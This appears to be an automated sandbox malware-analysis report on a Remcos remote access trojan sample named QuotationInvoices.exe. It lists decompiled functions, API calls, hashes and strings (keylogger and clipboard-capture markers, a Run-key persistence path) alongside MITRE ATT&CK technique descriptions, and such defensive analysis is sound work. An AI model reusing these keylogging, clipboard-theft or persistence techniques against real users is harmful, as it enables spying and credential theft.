Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: \^)|/
API String ID: 1834446548-265608074
Opcode ID: 39d3e3b6daf1f96d56e28a51a443b798eb7c1955f305328d028abedbcfb04d2b
Instruction ID: 547c64cb5f4eca2c7557be3b05d84b9e26456ba55e87b9779855a7cc7190d55a
Opcode Fuzzy Hash: 39d3e3b6daf1f96d56e28a51a443b798eb7c1955f305328d028abedbcfb04d2b
Instruction Fuzzy Hash: 02410831A401589BDB24CF24CC80BE973B5FB4C304F14A0ABE58997241D6B99DD2DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043BF0B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043BFE1

Strings

@, xrefs: 0043BF8C
\^)|/, xrefs: 0043BF13, 0043BF33, 0043BF97, 0043BFE6

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: \^)|/$@
API String ID: 269201875-3914626653
Opcode ID: 39d8ebb5885a7c5fddabff240a38f1602dc3323ebcaac821f9b8a03234071cb1
Instruction ID: 8ed32bd61a00be00c179002532f55fe44ee80c5dab55f8b1801fb27b04f94cf3
Opcode Fuzzy Hash: 39d8ebb5885a7c5fddabff240a38f1602dc3323ebcaac821f9b8a03234071cb1
Instruction Fuzzy Hash: ED419F36A00714DFCB18CF69C8C096EB7B1EF8D320B1582AAE515EB3A0D7749D40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00403FFA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404014

Part of subcall function 00416A77: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AE92,.vbs), ref: 00416A9E

Part of subcall function 0041735B: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408766), ref: 00417378

Sleep.KERNEL32(000000FA,0045E404), ref: 004040E6

Strings

/sort "Visit Time" /stext ", xrefs: 00404060

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 3753550655-1573945896
Opcode ID: 28b657061222206ef69b2fc64d7332154194313d88e1de8e2cb0ba350ba9a657
Instruction ID: 115ffdabf639f9b756c932fee55cc59c22d90187ec8d826ed010ebeaa8005bd9
Opcode Fuzzy Hash: 28b657061222206ef69b2fc64d7332154194313d88e1de8e2cb0ba350ba9a657
Instruction Fuzzy Hash: CF318071A0021957CB18F7B6DC56AEE7335AF91308F00007FFA06B70D2EE381A89C698

Uniqueness

Uniqueness Score: -1.00%

Function 00448497, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00448497(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = L00440B6A(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x458f48;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x458f50;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = L00435DEF(_t23, _t23);
									goto L25;
								}
								if(L00440B6A(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x0044849c
0x0044849d
0x004484a0
0x004484a4
0x0044854a
0x0044855e
0x00448563
0x00448565
0x0044856b
0x0044856e
0x00448570
0x00448572
0x00448572
0x00448578
0x0044857d
0x0044857d
0x00448567
0x00448567
0x00000000
0x00448567
0x004484aa
0x004484af
0x00000000
0x00000000
0x004484b5
0x004484ba
0x004484bc
0x004484bc
0x004484c2
0x00000000
0x00000000
0x004484c7
0x004484de
0x004484de
0x004484e7
0x004484e9
0x00000000
0x00000000
0x004484eb
0x004484f0
0x004484f2
0x004484f2
0x004484f8
0x00000000
0x00000000
0x004484fd
0x0044851b
0x0044851b
0x0044851d
0x00448542
0x00000000
0x00448547
0x0044853a
0x00000000
0x00000000
0x0044853c
0x00000000
0x0044853c
0x004484ff
0x00448507
0x00000000
0x00000000
0x00448509
0x0044850c
0x00448512
0x00000000
0x00000000
0x00000000
0x00448514
0x00448516
0x00448518
0x00448518
0x00000000
0x00448518
0x004484c9
0x004484d1
0x00000000
0x00000000
0x004484d3
0x004484d6
0x004484dc
0x00000000
0x00000000
0x00000000
0x004484dc
0x004484e2
0x004484e4
0x004484e4
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,004486F2,?,00000050,?,?,?,?,?), ref: 00448572

Strings

ACP, xrefs: 004484B5
OCP, xrefs: 004484EB

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 4f9aa27f454df9ae596b20a5c50e08d49a9f7a959e8043246a4ccbdedcf532bb
Instruction ID: daa7e094f0c2ea1151de093ba45bddbaabc3b9f38c082088b23ed9e25c229d07
Opcode Fuzzy Hash: 4f9aa27f454df9ae596b20a5c50e08d49a9f7a959e8043246a4ccbdedcf532bb
Instruction Fuzzy Hash: 5D21B362E00101B6FB348A64C901BAF7396EB64F65F56852EE909E7300FF3ADD41835D

Uniqueness

Uniqueness Score: -1.00%

Function 00443693, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,00443AD0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044373D
GetLastError.KERNEL32(?,00443AD0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,00436AA6,?,Offline Keylogger Started,?,FFEC8B55,?,75FF2075), ref: 00443766

Strings

\^)|/, xrefs: 004436A2

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: \^)|/
API String ID: 442123175-265608074
Opcode ID: 74905a55f6845034f4bb802de8f4af258fd9741422d4c4a0cbdb6002aa802d01
Instruction ID: 411a40fba187798d9bbb72fa9d44b23d01b9a7c281cb67c9c9e87b914e0aa9ff
Opcode Fuzzy Hash: 74905a55f6845034f4bb802de8f4af258fd9741422d4c4a0cbdb6002aa802d01
Instruction Fuzzy Hash: D531C3B1A002199BCB24CF5ACE809DAF3F9EF48711F1084ABE549D3250E734AE81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004435B4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,00443AF0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044364F
GetLastError.KERNEL32(?,00443AF0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,00436AA6,?,Offline Keylogger Started,?,FFEC8B55,?,75FF2075), ref: 00443678

Strings

\^)|/, xrefs: 004435C3

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: \^)|/
API String ID: 442123175-265608074
Opcode ID: 7ca78a33c3f942467d6b02a3ff467bbb6b3282926fe5840553019f4ede36e12a
Instruction ID: 23de8410d0805a550780f03de73b91b5575c1dac7ad32303bdfd46aa0a56afbb
Opcode Fuzzy Hash: 7ca78a33c3f942467d6b02a3ff467bbb6b3282926fe5840553019f4ede36e12a
Instruction Fuzzy Hash: B421D235600219AFCB24CF19CD80BEAB3F8EB08702F1104AAE94AD3351D774AE81CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0040993C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0042EB5C: __onexit.LIBCMT ref: 0042EB62

__Init_thread_footer.LIBCMT ref: 00409988

Strings

[End of clipboard text], xrefs: 004099D1
[Following text has been copied to clipboard:], xrefs: 004099CC

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
API String ID: 1881088180-3441917614
Opcode ID: da759abb9e24ca2b0e1c72b4f25bddd62217d957cc042144c267f126b5d8bab3
Instruction ID: 96592a3b78918775e2cd7bb51cf1ad733866565f1b908477d2f29258bbadff0d
Opcode Fuzzy Hash: da759abb9e24ca2b0e1c72b4f25bddd62217d957cc042144c267f126b5d8bab3
Instruction Fuzzy Hash: 4611D6717042045ACA04FA6AE8929AF77659B94318F10013FFA01773D3EE3C9D4686DD

Uniqueness

Uniqueness Score: -1.00%

Function 00440747, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000000), ref: 004407A7
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 004407B4

Strings

\^)|/, xrefs: 0044075B, 00440797, 004407BE, 004407C6

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: \^)|/
API String ID: 2279764990-265608074
Opcode ID: 1d66a8d5c54d10048414bc1c1d0f29fb5ea305beccd0006a8919617d0fc7bcf4
Instruction ID: ccdb314fe528f2cb6a95320d347af928e9698d7d5b7307346683489685131ee2
Opcode Fuzzy Hash: 1d66a8d5c54d10048414bc1c1d0f29fb5ea305beccd0006a8919617d0fc7bcf4
Instruction Fuzzy Hash: 36110637A015319BBF219F29DC8095B7395AB803647164232FE15AB354E674FC218EEB

Uniqueness

Uniqueness Score: -1.00%

Function 0042F3BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0042F3BB(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {

				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x2e");
				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0042f3c1
0x0042f3c4
0x0042f3c6
0x0042f3d1
0x0042f3da
0x0042f3f3

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042F3FF
___raise_securityfailure.LIBCMT ref: 0042F4E6

Strings

\^)|/, xrefs: 0042F4C7

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: \^)|/
API String ID: 3761405300-265608074
Opcode ID: 870a9de0649fbe9e5fc5abd1eac569cbc90a2dd6a25dfaaa656dd67f27dcfd0a
Instruction ID: cdf46f32624b17ca3e69ecdc670a65dbaf5e96aa7142a475a3033d2868543860
Opcode Fuzzy Hash: 870a9de0649fbe9e5fc5abd1eac569cbc90a2dd6a25dfaaa656dd67f27dcfd0a
Instruction Fuzzy Hash: 5A21BEB56002049AEB14DF15F9816917BA8BB49314F50943AE9088B3E0F3F65D95CF8E

Uniqueness

Uniqueness Score: -1.00%

Function 004408AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0044D80E,?,00000000,?,?,0044D7AD,?,?,?,0044D80E), ref: 00440909

Strings

@, xrefs: 004408E5
\^)|/, xrefs: 004408B2

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CompareString
String ID: \^)|/$@
API String ID: 1825529933-3914626653
Opcode ID: 1fc62b736b519362e8086830ae55b591f1e9a7d8a3ad9211023fae9a735f164e
Instruction ID: 6ecaa2c6c370dc023a736117b00fe4170fa537410c0fc1865d10e4a88ccd8336
Opcode Fuzzy Hash: 1fc62b736b519362e8086830ae55b591f1e9a7d8a3ad9211023fae9a735f164e
Instruction Fuzzy Hash: 3F010032500219BBCF029F90DD019EE7F66EF08350F00812AFE0566221CB36D931EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00408D8E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(?), ref: 00408DEC

Part of subcall function 00408DFF: GetLocalTime.KERNEL32(?,?,00000000), ref: 00408E0D
Part of subcall function 00408DFF: SetEvent.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00408EB3

Strings

[Info], xrefs: 00408DC9
Offline Keylogger Stopped, xrefs: 00408DA0, 00408DAC, 00408DBE

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventHookLocalTimeUnhookWindows
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2346154624-1791908007
Opcode ID: dfe14e701f93d31d14c7da221e8ebc36ffa3faaf2f579165c9586d7dd25436cc
Instruction ID: 36fc828503ff2234200cf6ddc9faaf56226415644da65d7458fb110130877d0a
Opcode Fuzzy Hash: dfe14e701f93d31d14c7da221e8ebc36ffa3faaf2f579165c9586d7dd25436cc
Instruction Fuzzy Hash: 72F028216002402BE7353339890A36A7EA14F53311F14067FE0C1226E3EFBD0885B39F

Uniqueness

Uniqueness Score: -1.00%

Function 0041061C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046B4E0,80000002,?,0040ADD0,00000000,?,0046B4F8,0046B4E0), ref: 0041062A
RegDeleteValueW.ADVAPI32(0046B4E0,0046B4F8,?,0040ADD0,00000000,?,0046B4F8,0046B4E0), ref: 0041063E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410628

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: abc9b14c0e9cca758d339038eefb8113761b1a980280b0166aac3126a48059a4
Instruction ID: 8a3b3bff01928446f1a81e8eda1b4027ad64593ca5c950c64a47b0e0631764fc
Opcode Fuzzy Hash: abc9b14c0e9cca758d339038eefb8113761b1a980280b0166aac3126a48059a4
Instruction Fuzzy Hash: 71E0C231140308BFEF104F60DD06FFF372CEB42B02F1002A6BA0692091D6A6CA55D668

Uniqueness

Uniqueness Score: -1.00%

Function 0044969B, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401C9D), ref: 00449731
GetLastError.KERNEL32 ref: 0044973F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044979A

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: cb229604ff23e53024fd029e166d226ba53b3caa90598b416bf2d08f81b97667
Instruction ID: 070b53b25643396b1fc1ae6caace7fd88186a852330154e3fdcc446355dd58c8
Opcode Fuzzy Hash: cb229604ff23e53024fd029e166d226ba53b3caa90598b416bf2d08f81b97667
Instruction Fuzzy Hash: 64414A34610212EFEF219F64C884AABBBA4EF42320F15416BF85967295D7388D01E768

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report QuotationInvoices.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Remcos

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Function 6FC51A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Function 10004243, Relevance: 3.1, APIs: 2, Instructions: 52
processCOMMON

Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208
memoryCOMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 100042E6, Relevance: 12.0, APIs: 4, Strings: 1, Instructions: 3274
filememoryCOMMON

